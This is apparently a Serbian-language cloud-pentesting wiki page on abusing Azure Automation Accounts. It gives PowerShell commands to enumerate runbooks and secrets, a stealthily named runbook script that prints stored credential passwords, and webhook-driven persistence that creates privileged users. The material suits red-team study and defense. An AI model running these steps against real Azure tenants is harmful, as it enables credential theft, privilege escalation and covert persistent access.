Az - Automation Account

Basic Information

From the docs: Azure Automation pruža uslugu automatizacije zasnovanu na oblaku, ažuriranja operativnog sistema i uslugu konfiguracije koja podržava dosledno upravljanje u vašim Azure i ne-Azure okruženjima. Uključuje automatizaciju procesa, upravljanje konfiguracijom, upravljanje ažuriranjima, zajedničke mogućnosti i heterogene karakteristike.

Ovo su poput "zakazanih zadataka" u Azure-u koji će vam omogućiti da izvršavate stvari (akcije ili čak skripte) za upravljanje, proveru i konfiguraciju Azure okruženja.

Run As Account

Kada se koristi Run as Account, kreira se Azure AD aplikacija sa samopotpisanim sertifikatom, kreira se servisni principal i dodeljuje se Contributor uloga za nalog u trenutnoj pretplati (mnogo privilegija). Microsoft preporučuje korišćenje Managed Identity za Automation Account.

Runbooks & Jobs

Runbooks vam omogućavaju da izvršavate proizvoljni PowerShell kod. Ovo bi moglo biti zloupotrebljeno od strane napadača da ukrade dozvole pridruženog principala (ako ih ima). U kod-u Runbooks takođe možete pronaći osetljive informacije (kao što su kredencijali).

Ako možete pročitati poslove, uradite to jer sadrže izlaz izvršenja (potencijalne osetljive informacije).

Idite na Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

Runbook se može izvršiti u kontejneru unutar Azure-a ili u Hybrid Worker (mašina koja nije Azure). Log Analytics Agent se instalira na VM-u da bi se registrovao kao hibridni radnik. Poslovi hibridnog radnika se izvršavaju kao SYSTEM na Windows-u i nxautomation nalog na Linux-u. Svaki Hibridni Radnik je registrovan u Hybrid Worker Group.

Stoga, ako možete izabrati da izvršite Runbook u Windows Hybrid Worker, izvršićete proizvoljne komande unutar spoljne mašine kao System (dobar pivot tehnika).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration je usluga upravljanja konfiguracijom u Azure-u koja vam omogućava da pišete, upravljate i kompajlirate PowerShell Desired State Configuration (DSC) konfiguracije za čvorove u bilo kojoj cloud ili lokalnoj datacentru. Usluga takođe uvozi DSC Resources i dodeljuje konfiguracije ciljnim čvorovima, sve u oblaku. Možete pristupiti Azure Automation State Configuration u Azure portalu tako što ćete izabrati State configuration (DSC) pod Configuration Management.

Osetljive informacije se mogu naći u ovim konfiguracijama.

RCE

Moguće je zloupotrebiti SC da se izvrše proizvoljne skripte na upravljanim mašinama.

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Kreirajte Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Ekstraktovanje kredencijala i promenljivih definisanih u Automation Account koristeći Run Book

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Koraci za Postavljanje Automatizovane Kreacije Korisnika sa Visokim Ovlašćenjima

1. Inicijalizujte Automatizovani Nalog

• Akcija koja je potrebna: Kreirajte novi Automatizovani Nalog.

• Specifična postavka: Osigurajte da je "Kreiraj Azure Run As nalog" omogućeno.

2. Uvezite i Postavite Runbook

• Izvor: Preuzmite uzorak runbook-a sa MicroBurst GitHub Repository.

• Potrebne akcije:

• Uvezite runbook u Automatizovani Nalog.

• Objavite runbook da bi postao izvršiv.

• Priključite webhook na runbook, omogućavajući spoljne okidače.

3. Konfigurišite AzureAD Modul

• Akcija koja je potrebna: Dodajte AzureAD modul u Automatizovani Nalog.

• Dodatni korak: Osigurajte da su svi Azure Automatizovani Moduli ažurirani na najnovije verzije.

4. Dodeljivanje Dozvola

• Uloge za dodeljivanje:

• Administrator korisnika

• Vlasnik pretplate

• Cilj: Dodelite ove uloge Automatizovanom Nalog za potrebna ovlašćenja.

5. Svest o Potencijalnom Gubitku Pristupa

• Napomena: Budite svesni da konfiguracija takve automatizacije može dovesti do gubitka kontrole nad pretplatom.

6. Okidanje Kreacije Korisnika

• Okidajte webhook da kreirate novog korisnika slanjem POST zahteva.

• Koristite PowerShell skriptu koja je data, osiguravajući da zamenite $uri sa vašom stvarnom webhook URL adresom i ažurirate $AccountInfo sa željenim korisničkim imenom i lozinkom.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

References

• https://learn.microsoft.com/en-us/azure/automation/overview

• https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview

• https://github.com/rootsecdev/Azure-Red-Team#runbook-automation